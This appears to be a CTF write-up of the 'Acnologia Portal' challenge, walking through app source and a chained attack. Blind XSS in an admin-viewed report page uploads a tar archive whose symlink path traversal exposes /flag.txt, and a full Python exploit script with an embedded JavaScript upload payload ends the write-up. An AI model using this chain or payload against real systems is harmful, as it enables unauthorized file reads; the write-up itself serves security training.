layout | title | subtitle | cover-img | thumbnail-img | share-img | tags | |
---|---|---|---|---|---|---|---|
post |
B-XSS -> ZipSlip -> Local File Read |
ZipSlip |
/assets/img/wsc.jpg |
/assets/img/wsc.jpg |
/assets/img/wsc.jpg |
|
Acnologia Portal is a Web Chal in Cyber Apocalypse CTF 2022.
This is a Typical XSS Web chal allow us to Create Account and Login and there is a Report functionality.
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy_serializer import SerializerMixin
from flask_login import UserMixin
from flask import current_app
db = SQLAlchemy()
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(100), unique=True)
password = db.Column(db.String(100))
class Firmware(db.Model, UserMixin, SerializerMixin):
id = db.Column(db.Integer, primary_key=True)
module = db.Column(db.String(100))
hw_version = db.Column(db.String(100))
fw_version = db.Column(db.String(100))
serial = db.Column(db.String(100))
hub_id = db.Column(db.String(100))
class Report(db.Model, UserMixin, SerializerMixin):
id = db.Column(db.Integer, primary_key=True)
module_id = db.Column(db.Integer)
reported_by = db.Column(db.String(100))
issue = db.Column(db.Text)
def clear_reports():
db.session.query(Report).delete()
db.session.commit()
def clear_db():
meta = db.metadata
for table in reversed(meta.sorted_tables):
db.session.execute(table.delete())
db.session.commit()
def migrate_db():
clear_db()
# admin user
db.session.add(User(id=1, username=current_app.config['ADMIN_USERNAME'], password=current_app.config['ADMIN_PASSWORD']))
# firmwares
db.session.add(Firmware(id=1, module='Launch pod interface', hw_version='d3', fw_version='2408.b', serial='c6c3b20e', hub_id='17310'))
db.session.add(Firmware(id=2, module='Oxidizer controller', hw_version='a4', fw_version='1801.c', serial='b20418fc', hub_id='33194'))
db.session.add(Firmware(id=3, module='Propellant damper', hw_version='b6', fw_version='1705.e', serial='7fdee87d', hub_id='19696'))
db.session.add(Firmware(id=4, module='RD-983 compressor', hw_version='a1', fw_version='0002.a', serial='b0dae2e3', hub_id='91284'))
db.session.add(Firmware(id=5, module='Refinery interface', hw_version='g4', fw_version='4323.d', serial='d0f2798d', hub_id='31157'))
db.session.add(Firmware(id=6, module='Condensation chamber', hw_version='k3', fw_version='3467.p', serial='2e1e7897', hub_id='19850'))
db.session.add(Firmware(id=7, module='Fission reactor', hw_version='p3', fw_version='9031.g', serial='9c431d03', hub_id='12488'))
db.session.add(Firmware(id=8, module='Booster core', hw_version='i7', fw_version='7651.g', serial='cd003b79', hub_id='12488'))
db.session.add(Firmware(id=9, module='Surface calibrator', hw_version='a1', fw_version='4632.g', serial='b320babd', hub_id='14274'))
db.session.add(Firmware(id=10, module='Nozzle controller', hw_version='f6', fw_version='8731.g', serial='8be939d9', hub_id='78804'))
db.session.commit()
import json
from application.database import User, Firmware, Report, db, migrate_db
from application.util import is_admin, extract_firmware
from flask import Blueprint, jsonify, redirect, render_template, request
from flask_login import current_user, login_required, login_user, logout_user
from application.bot import visit_report
web = Blueprint('web', __name__)
api = Blueprint('api', __name__)
def response(message):
return jsonify({'message': message})
@web.route('/', methods=['GET'])
def login():
return render_template('login.html')
@api.route('/login', methods=['POST'])
def user_login():
if not request.is_json:
return response('Missing required parameters!'), 401
data = request.get_json()
username = data.get('username', '')
password = data.get('password', '')
if not username or not password:
return response('Missing required parameters!'), 401
user = User.query.filter_by(username=username).first()
if not user or not user.password == password:
return response('Invalid username or password!'), 403
login_user(user)
return response('User authenticated successfully!')
@web.route('/register', methods=['GET'])
def register():
return render_template('register.html')
@api.route('/register', methods=['POST'])
def user_registration():
if not request.is_json:
return response('Missing required parameters!'), 401
data = request.get_json()
username = data.get('username', '')
password = data.get('password', '')
if not username or not password:
return response('Missing required parameters!'), 401
user = User.query.filter_by(username=username).first()
if user:
return response('User already exists!'), 401
new_user = User(username=username, password=password)
db.session.add(new_user)
db.session.commit()
return response('User registered successfully!')
@web.route('/dashboard')
@login_required
def dashboard():
return render_template('dashboard.html')
@api.route('/firmware/list', methods=['GET'])
@login_required
def firmware_list():
firmware_list = Firmware.query.all()
return jsonify([row.to_dict() for row in firmware_list])
@api.route('/firmware/report', methods=['POST'])
@login_required
def report_issue():
if not request.is_json:
return response('Missing required parameters!'), 401
data = request.get_json()
module_id = data.get('module_id', '')
issue = data.get('issue', '')
if not module_id or not issue:
return response('Missing required parameters!'), 401
new_report = Report(module_id=module_id, issue=issue, reported_by=current_user.username)
db.session.add(new_report)
db.session.commit()
visit_report()
migrate_db()
return response('Issue reported successfully!')
@api.route('/firmware/upload', methods=['POST'])
@login_required
@is_admin
def firmware_update():
if 'file' not in request.files:
return response('Missing required parameters!'), 401
extraction = extract_firmware(request.files['file'])
if extraction:
return response('Firmware update initialized successfully.')
return response('Something went wrong, please try again!'), 403
@web.route('/review', methods=['GET'])
@login_required
@is_admin
def review_report():
Reports = Report.query.all()
return render_template('review.html', reports=Reports)
@web.route('/logout')
@login_required
def logout():
logout_user()
return redirect('/')
- login_required check if the user is authenticated
def is_admin(f):
@functools.wraps(f)
def wrap(*args, **kwargs):
if current_user.username == current_app.config['ADMIN_USERNAME'] and request.remote_addr == '127.0.0.1':
return f(*args, **kwargs)
else:
return abort(401)
return wrap
- is_admin check if the username is equal to the Admin Username and the IP Adress
app.register_blueprint(web, url_prefix='/')
app.register_blueprint(api, url_prefix='/api')
- web routes are not Interesting
/api/register
route to register user
@api.route('/register', methods=['POST'])
def user_registration():
if not request.is_json:
return response('Missing required parameters!'), 401
data = request.get_json()
username = data.get('username', '')
password = data.get('password', '')
if not username or not password:
return response('Missing required parameters!'), 401
user = User.query.filter_by(username=username).first()
if user:
return response('User already exists!'), 401
new_user = User(username=username, password=password)
db.session.add(new_user)
db.session.commit()
return response('User registered successfully!')
@web.route('/dashboard')
/api/login
route to login
@api.route('/login', methods=['POST'])
def user_login():
if not request.is_json:
return response('Missing required parameters!'), 401
data = request.get_json()
username = data.get('username', '')
password = data.get('password', '')
if not username or not password:
return response('Missing required parameters!'), 401
user = User.query.filter_by(username=username).first()
if not user or not user.password == password:
return response('Invalid username or password!'), 403
login_user(user)
return response('User authenticated successfully!')
-
/api/firmware/report
route to handle the Report from user and Save in the DB -
visit_report()
is a Function that trigger the Bot to View the Report. -
migrate_db()
is a Function which clear the clear the database (report column)
@api.route('/firmware/report', methods=['POST'])
@login_required
def report_issue():
if not request.is_json:
return response('Missing required parameters!'), 401
data = request.get_json()
module_id = data.get('module_id', '')
issue = data.get('issue', '')
if not module_id or not issue:
return response('Missing required parameters!'), 401
new_report = Report(module_id=module_id, issue=issue, reported_by=current_user.username)
db.session.add(new_report)
db.session.commit()
visit_report()
migrate_db()
return response('Issue reported successfully!')
-
/api/firmware/upload
route can handle file Uploads, we can Upload files to the Server via this route -
@login_required
and@is_admin
is required. So only Admin can Upload files
@api.route('/firmware/upload', methods=['POST'])
@login_required
@is_admin
def firmware_update():
if 'file' not in request.files:
return response('Missing required parameters!'), 401
extraction = extract_firmware(request.files['file'])
if extraction:
return response('Firmware update initialized successfully.')
return response('Something went wrong, please try again!'), 403
extract_firmware()
function is responsible to extract files
def extract_firmware(file):
tmp = tempfile.gettempdir()
path = os.path.join(tmp, file.filename)
file.save(path)
if tarfile.is_tarfile(path):
tar = tarfile.open(path, 'r:gz')
tar.extractall(tmp)
rand_dir = generate(15)
extractdir = f"{current_app.config['UPLOAD_FOLDER']}/{rand_dir}"
os.makedirs(extractdir, exist_ok=True)
for tarinfo in tar:
name = tarinfo.name
if tarinfo.isreg():
try:
filename = f'{extractdir}/{name}'
os.rename(os.path.join(tmp, name), filename)
continue
except:
pass
os.makedirs(f'{extractdir}/{name}', exist_ok=True)
tar.close()
return True
return False
- At First, the Uploaded files are stored in the
/tmp
and variablepath
hold the name of thefile
withpath
. like/tmp/myfile.tar.gz
tmp = tempfile.gettempdir()
path = os.path.join(tmp, file.filename)
file.save(path)
- The Below If condition checks if the Uploaded file is valid tar file. if True -> extract all files in
/tmp
dir
if tarfile.is_tarfile(path):
tar = tarfile.open(path, 'r:gz')
tar.extractall(tmp)
-
The Below for Loop check if the Extracted files are Normal files. The
tarinfo.isreg()
function Checks if the file is a normal file or a symlink file. -
If the Extracted Files are Valid files, then the files are Moved to
/app/application/static/firmware/[random_number]
. We can access these files in/static
dir where the static js, css, png are Stored, if We can Leak the[random_number]
, We can Read files Uploaded by Admin. -
If the Extracted Files are not Valid Files, then the Files are Removed and Not moved to
/static
dir.
for tarinfo in tar:
name = tarinfo.name
if tarinfo.isreg():
try:
filename = f'{extractdir}/{name}'
os.rename(os.path.join(tmp, name), filename)
continue
except:
pass
os.makedirs(f'{extractdir}/{name}', exist_ok=True)
tar.close()
/review
is aGET
Route where the Reports are Rendered. OnlyAdmin
user can view this Route.
@web.route('/review', methods=['GET'])
@login_required
@is_admin
def review_report():
Reports = Report.query.all()
return render_template('review.html', reports=Reports)
- In
Review.html
, The User Input is Not Sanitized Before passed, So we Have a XSS here!
<div class="card-header"> Reported by : USER
</div>
<div class="card-body">
<p class="card-title">Module ID : {{ report.module_id }}</p>
<p class="card-text">Issue : {{ report.issue | safe }} </p>
<a href="#" class="btn btn-primary">Reply</a>
<a href="#" class="btn btn-danger">Delete</a>
</div>
-
Now, We have a XSS, Cookies are Set to
HTTP Only
, So, we cannot get the Admin Bot Cookie and Alsois_admin()
function checks if the ip is '127.0.0.1' or Not. -
Now, with Blind XSS, we need to craft a Payload to Send a
tar
file to/api/firmware/upload
. -
There is a WellKnown Vulnerability
ZipSlip
which allow us to pack files into tar or zip files, which are path traversaled when the zip file is unziped. -
Creating a
symlink
file that pointing to/flag.txt
and using zipslip Vulnerability to traversal the Extracted Files. -
We can traversal the
symlink
file to/app/applicaition/static/getflag.txt
while unziping the tar file.[getflag.txt is a symlink file pointing to /flag.txt]
-
By traversaling the Extracted files to
/app/applicaition/static
will help to bypass thetarinfo.isreg()
function. Bcoz, this function checks the files present in/tmp
dir where the normal files are initially Extracted.
- I wrote a Python Script to Automate this.
import requests
import os
import random
import string
import tarfile
letters = string.ascii_lowercase
randomText= ''.join(random.choice(letters) for i in range(10))
url = 'http://localhost:1337'
def registerUser(username, password):
r = requests.post(url + '/api/register', json={"username":username,"password":password})
if r.status_code != 200:
print(r.text)
exit()
def loginUser(username, password):
r = requests.post(url + '/api/login', json={"username":username,"password":password})
if r.status_code != 200:
print(r.text)
exit()
session = r.headers['Set-Cookie'].split(';')[0].split('=')[1]
global cookies
cookies = {
'session':session
}
r = requests.get(url + '/dashboard', cookies=cookies)
def makeTar():
os.system(f'mkdir ../app')
os.system(f'mkdir ../app/application/')
os.system(f'mkdir ../app/application/static')
os.system('ln -s /flag.txt getflag.txt; mv getflag.txt ../app/application/static/')
tar = tarfile.open('exp.tar','w')
tar.add('../app/application/static/getflag.txt')
tar.close()
os.system('gzip exp.tar')
os.system('rm -rf ../app')
def js():
string = os.popen('cat exp.tar.gz | base64 -w0')
os.system('rm -rf exp.tar.gz')
b64String = string.read()
global js
js = """
<script>
function base64toBlob(base64Data, contentType) {
contentType = contentType || '';
var sliceSize = 1024;
var byteCharacters = atob(base64Data);
var bytesLength = byteCharacters.length;
var slicesCount = Math.ceil(bytesLength / sliceSize);
var byteArrays = new Array(slicesCount);
for (var sliceIndex = 0; sliceIndex < slicesCount; ++sliceIndex) {
var begin = sliceIndex * sliceSize;
var end = Math.min(begin + sliceSize, bytesLength);
var bytes = new Array(end - begin);
for (var offset = begin, i = 0; offset < end; ++i, ++offset) {
bytes[i] = byteCharacters[offset].charCodeAt(0);
}
byteArrays[sliceIndex] = new Uint8Array(bytes);
}
return new Blob(byteArrays, { type: contentType });
}
var b64file = """+f"'{b64String}'"+""";
var content_type = 'application/x-gtar-compressed';
var blob = base64toBlob(b64file, content_type);
var formData = new FormData();
formData.append('file', blob,'abcd');
var url = 'http://localhost:1337/api/firmware/upload';
var request = new XMLHttpRequest();
request.withCredentials = true;
request.open('POST', url);
request.send(formData);
</script>
"""
def report():
r = requests.post(url + '/api/firmware/report', cookies=cookies, json={"module_id": "1", "issue": f"{js}"})
if r.status_code != 200:
print(r.text)
exit()
def getflag():
r = requests.get(url+'/static/getflag.txt')
print(r.text.strip())
exit()
def main():
registerUser(randomText,randomText)
loginUser(randomText, randomText)
makeTar()
js()
report()
getflag()
if __name__ == "__main__":
main()
FLAG : HTB{des3r1aliz3_4ll_th3_th1ngs}